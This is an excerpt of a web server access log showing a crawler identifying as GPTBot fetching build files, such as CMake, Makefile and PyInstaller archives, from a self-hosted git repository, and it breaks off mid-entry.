"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:16:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:16:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10199] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:16:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10426] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 99908] [Gzip 29.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:16:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 49735] [Gzip 27.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:16:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11043] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10193] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17035] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12992] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11008] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11590] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp" +[17/Feb/2026:16:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10219] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11895] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 160535] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:16:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15120] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13468] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" +[17/Feb/2026:16:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17963] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14153] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11020] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10226] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11084] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70929] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12960] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" +[17/Feb/2026:16:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16389] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" +[17/Feb/2026:16:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11619] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp" +[17/Feb/2026:16:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 71207] [Gzip 17.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 71998] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10612] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" +[17/Feb/2026:16:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13546] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" +[17/Feb/2026:16:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:16:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 12909107] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:16:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10199] [Gzip 